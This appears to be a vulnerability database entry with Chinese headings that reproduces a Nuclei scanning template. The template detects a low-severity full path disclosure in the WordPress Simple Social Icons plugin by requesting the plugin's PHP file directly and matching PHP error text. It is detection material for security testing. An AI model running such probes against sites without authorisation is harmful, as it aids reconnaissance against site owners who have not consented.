漏洞描述
WordPress Plugin Simple Social Icons files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
wordpress-simple-social-icons-fpd: WordPress Simple Social Icons - Full Path Disclosure
PoC代码[已公开]
id: wordpress-simple-social-icons-fpd
info:
name: WordPress Simple Social Icons - Full Path Disclosure
author: DhiyaneshDk
severity: low
description: |
WordPress Plugin Simple Social Icons files are publicly accessible without ABSPATH protection, exposing sensitive server path information through PHP error messages when accessed directly.
reference:
- https://wordpress.org/plugins/simple-social-icons/
metadata:
verified: true
max-request: 1
publicwww-query: "/plugins/simple-social-icons"
tags: wp,wordpress,wp-plugin,fpd,simple-social-icons,misconfig
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/simple-social-icons/simple-social-icons.php"
matchers:
- type: dsl
dsl:
- 'status_code == 200 || status_code == 500'
- 'contains(body, "simple-social-icons")'
- 'contains_all(body, "Fatal error", "Uncaught Error") || contains_all(body, "Warning:","failed to open stream")'
condition: and
# digest: 490a0046304402200b0e0a6b82037ec76d026d54108f0ee214b24f0eb43c78d9cc83ccf9f4c7466702200b8467cb0faf52ef041ad7156e0f3ed2a1a6bdd98deb4a59e7ad1e17d9dca264:922c64590222798bb761d5b6d8e72950